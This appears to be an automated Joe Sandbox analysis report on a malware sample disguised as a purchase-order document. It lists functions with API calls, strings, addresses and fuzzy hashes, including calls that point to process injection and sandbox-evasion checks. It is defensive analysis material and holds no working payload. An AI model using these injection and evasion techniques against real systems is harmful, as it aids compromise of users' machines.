Opcode Fuzzy Hash: 98eb3e34cd1e58c0e890594f72b606a219bd82088c682b6b97e6d1aec551d998
Instruction Fuzzy Hash: F3F0DA755412907AEB311717BC4CEB77EBDD7D6F50B0081AAFA10A26A4CA711860DAB0

Function 00F4CD10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F4CC00: Sleep.KERNELBASE(000001F4), ref: 00F4CC11

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F4CE29

Strings

JPPZRNIL7JN2XB, xrefs: 00F4CE8C, 00F4CE8F

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateFileSleep
String ID: JPPZRNIL7JN2XB
API String ID: 2694422964-1320512182
Opcode ID: c022c776d5c0f4000647c82582226a3e53e3a6dccec0104e83173fecdbcc6ed2
Instruction ID: c2a550415873bb6d45ee2d4453a11e1ca600efa516e02fc53eef597d8af68363
Opcode Fuzzy Hash: c022c776d5c0f4000647c82582226a3e53e3a6dccec0104e83173fecdbcc6ed2
Instruction Fuzzy Hash: 5A518F31D05248EBEF10DBE4C854BEFBB79AF18300F004198E609BB2C0D7B95A48DBA5

Function 00143B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B83

Strings

Control Panel\Mouse, xrefs: 00143B3E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 022867eb696bea49f260880f4ca58205ecf9351c107aacc981200d662693c84f
Instruction ID: 05c8c34c3dd679a1e2d532110c64d2e34b23004a63b7025dffab3d925e26d23c
Opcode Fuzzy Hash: 022867eb696bea49f260880f4ca58205ecf9351c107aacc981200d662693c84f
Instruction Fuzzy Hash: 5A1127B5611208FFDB218FA5DC84AAEBBB8EF44744B10896AB815D7120E3319E449BA0

Function 00F4BC00 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F4C3BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F4C451
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F4C473

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction ID: a9b2e13e8a006a14438c7037bef81b20c4f63a30b2894649381cc8bffd413b93
Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction Fuzzy Hash: 1C621E30A14258DBEB24CFA4C850BEEB772EF58700F1091A9D50DEB390E7799E81DB59

Function 00143923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001833A2

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00143A04

Strings

Line: , xrefs: 001833EB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 6126b27c6f66b2cd7249d2553ea3217cba9e35d059d9fbec744e21ead6e66d80
Instruction ID: 81110704e350a6b4b1baeef3ac90c5834fc29471585895165c33ad2552354d52
Opcode Fuzzy Hash: 6126b27c6f66b2cd7249d2553ea3217cba9e35d059d9fbec744e21ead6e66d80
Instruction Fuzzy Hash: 0631D471408301AAD725EB20DC49BEBB7D8AF65714F10492AF5A9831E1DF709758C7C3

Function 00142DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00182C8C

Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2

Part of subcall function 00142DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00142DC4

Strings

X, xrefs: 00182C5A
`e , xrefs: 00182C85

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e
API String ID: 779396738-2317500276
Opcode ID: 336dfa3ceb6bac2fd25ff9c912dda595ccffe57d0520d7dcbd20beab474e227b
Instruction ID: 9da59205d3814f4b84aa35fe828db8ea1ee6616943ff8b0c8a7dfe2fb11d8cc6
Opcode Fuzzy Hash: 336dfa3ceb6bac2fd25ff9c912dda595ccffe57d0520d7dcbd20beab474e227b
Instruction Fuzzy Hash: 7121A571A102589FCB01EF94C849BEE7BFCAF59314F008059F505B7291DBB45A99CFA1

Function 0015FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00160668

Part of subcall function 001632A4: RaiseException.KERNEL32(?,?,?,0016068A,?,00211444,?,?,?,?,?,?,0016068A,00141129,00208738,00141129), ref: 00163304

__CxxThrowException@8.LIBVCRUNTIME ref: 00160685

Strings

Unknown exception, xrefs: 00160692

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 0f0e28f3ec19ea913aeb42599915ae6c6c8ad24037aadb371343cf1bb2085d42
Instruction ID: 2585f8eee538a08e19a4bd40b75c0c5592a7a4af6d6b1bc37809aded8bf6d051
Opcode Fuzzy Hash: 0f0e28f3ec19ea913aeb42599915ae6c6c8ad24037aadb371343cf1bb2085d42
Instruction Fuzzy Hash: FFF0C23490030DB7CB05BAA4DC46C9F7B7C5E14310B604539BD249A5D2EF71DA7AC581

Function 001C7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001C82F5
TerminateProcess.KERNEL32(00000000), ref: 001C82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 001C84DD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: db867b5aeff880728867cbfc0f6aeedc3b46e758d521d1d27ed000ef0624d3e5
Instruction ID: 2ae0f9d9357655028efddbd40659a56274d71d8126a0dd08beed543e1a0e1509
Opcode Fuzzy Hash: db867b5aeff880728867cbfc0f6aeedc3b46e758d521d1d27ed000ef0624d3e5
Instruction Fuzzy Hash: 12126A719083419FC714DF28C484B6ABBE5BF99318F04895DE8998B392DB31ED45CF92

Function 001410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00141BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00141BF4
Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00141BFC
Part of subcall function 00141BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00141C07
Part of subcall function 00141BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00141C12
Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00141C1A
Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00141C22

Part of subcall function 00141B4A: RegisterWindowMessageW.USER32(00000004,?,001412C4), ref: 00141BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0014136A
OleInitialize.OLE32 ref: 00141388
CloseHandle.KERNEL32(00000000,00000000), ref: 001824AB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: aa9fb601d83b2a0b0d6b5c61aec9219ed926e77946ce6fab1254a9e2655c33e3
Instruction ID: 7918de0e5dee6fd50aa8001c640f892856d01649ae258b52ffa407ad9ccc3375
Opcode Fuzzy Hash: aa9fb601d83b2a0b0d6b5c61aec9219ed926e77946ce6fab1254a9e2655c33e3
Instruction Fuzzy Hash: 1271CCB4912201AED788DF79B9496D57BE6FBB8344395C22AD20AC7371EF304461CF84

Function 001786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,001785CC,?,00208CC8,0000000C), ref: 00178704
GetLastError.KERNEL32(?,001785CC,?,00208CC8,0000000C), ref: 0017870E
__dosmaperr.LIBCMT ref: 00178739

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 4ec592fc25d98bbefa69ffd4faf057bd59d02dc65a4e8f4f3b891256e0737c7f
Instruction ID: 4bbf35634205e431151b91b1eb9d6a99bedba808aeaf31efbf71d60c225a6e22
Opcode Fuzzy Hash: 4ec592fc25d98bbefa69ffd4faf057bd59d02dc65a4e8f4f3b891256e0737c7f
Instruction Fuzzy Hash: C3010432E4562036D6286234A84EB6E677B5BA2774F39C119F81C8B1E2DFF09CC18190

Function 00151310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001517F6

Strings

CALL, xrefs: 001517C6

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 95d7b3225ccfc13bb5b6cb8dd4037ab550517f8abea170eef026a86faffbf618
Instruction ID: d48d9ec6863c544d75128a64984a79e5ee85a17114b60794709e7c9a6a64b0b9
Opcode Fuzzy Hash: 95d7b3225ccfc13bb5b6cb8dd4037ab550517f8abea170eef026a86faffbf618
Instruction Fuzzy Hash: D0229B70608201EFCB15DF14C480B2ABBF1BF99315F15891DF8AA8B3A1D771E949CB92

Function 00143837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00143908

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: aab16b3b30b57e62e47cb3bb349f9861b6bcf864598d8bf45c06c8c784d49e88
Instruction ID: 9411a5b253101be341d46321de6befe05518de3dd0355abdef6061c2b6f043d7
Opcode Fuzzy Hash: aab16b3b30b57e62e47cb3bb349f9861b6bcf864598d8bf45c06c8c784d49e88
Instruction Fuzzy Hash: 2031A2B05057019FD720DF24D8857D7FBE8FB59708F00096EFAA983250EB71AA54CB92

Function 00145745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00145773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00184052

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 22bfc5d6d9d4e97b41686ce45746c7a5cb7717782aa2cfaec57f5e9ef528a84e
Instruction ID: 1c6ebcf31b88a618bc1d95a1a9ac1e38c184166f4b30a8cfde579b30e19b600b
Opcode Fuzzy Hash: 22bfc5d6d9d4e97b41686ce45746c7a5cb7717782aa2cfaec57f5e9ef528a84e
Instruction Fuzzy Hash: 65014C31245225B7E3315A2ADC0EF977F99EF027B1F158211BAAC6A1E1CBB45894CB90

Function 00F4BBFD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F4C3BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F4C451
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F4C473

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: cdb8adea10b39a39912c955c02daf67daa6cf9aa791a6699fa26dbc2269ab690
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: 1B12CF24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A

Function 001C709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 6f29765511eac6b45b249131bcc45469aca5234017d90c8a7a75a8bba9262c1a
Instruction ID: 12a92029ebb15bdbb63de2e8dcfbd053cbfd94393841aefb2e4ef2f178e533c4
Opcode Fuzzy Hash: 6f29765511eac6b45b249131bcc45469aca5234017d90c8a7a75a8bba9262c1a
Instruction Fuzzy Hash: 89D15B74A04209EFCB14DF98D881EADBBB5FF68310F15415AE915AB291EB70ED81CF90

Function 0015FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0015FD1F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a8f6e7be758d27c7d486a8d94182f75aac87acbb571e27998b88723ad2c5d872
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D7310074A00109DBC718CF99D480969FBB2FB49302B6486B9E819CF656D731EDCADBC0

Function 00144ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00144E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E9C
Part of subcall function 00144E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00144EAE
Part of subcall function 00144E90: FreeLibrary.KERNEL32(00000000,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EFD

Part of subcall function 00144E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E62
Part of subcall function 00144E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00144E74
Part of subcall function 00144E59: FreeLibrary.KERNEL32(00000000,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E87

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 2078805050c0e78f77aaf7426b0e072f1bfa5ee583f24d5ce6aaf659a201d639
Instruction ID: a4aa1862ad92137c0a85e13f3992fee2b44a760dede1f04af7f7d0f325fea66c
Opcode Fuzzy Hash: 2078805050c0e78f77aaf7426b0e072f1bfa5ee583f24d5ce6aaf659a201d639
Instruction Fuzzy Hash: 4E11E332600205ABDF14BB64DC02FAD77A5AF60B10F10882EF542B61E1EF759A499B90

Function 00178402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00178440

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d612ad91ba4fe8eec4871fd71cf52115811780082cd4112405490dbcacefd360
Instruction ID: 594a49c1b32aa92fca752eeb5f2722b3f5da8ed7bba543b7b1da96cbc26c1c9f
Opcode Fuzzy Hash: d612ad91ba4fe8eec4871fd71cf52115811780082cd4112405490dbcacefd360
Instruction Fuzzy Hash: 7111487190810AAFCB05DF58E944A9A7BF4EF48314F108059F809AB312DB70EA11CBA4

Function 00175000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00174C7D: RtlAllocateHeap.NTDLL(00000008,00141129,00000000,?,00172E29,00000001,00000364,?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?), ref: 00174CBE

_free.LIBCMT ref: 0017506C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: c6b0e97005bb097bc09479a45bcf41d0f0afd96596ed0a0f532df9eda933734a
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 550126722047086BE3218E659881A5AFBF9FB89370F25451DF19883280EB70A805C6B4

Function 0016E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
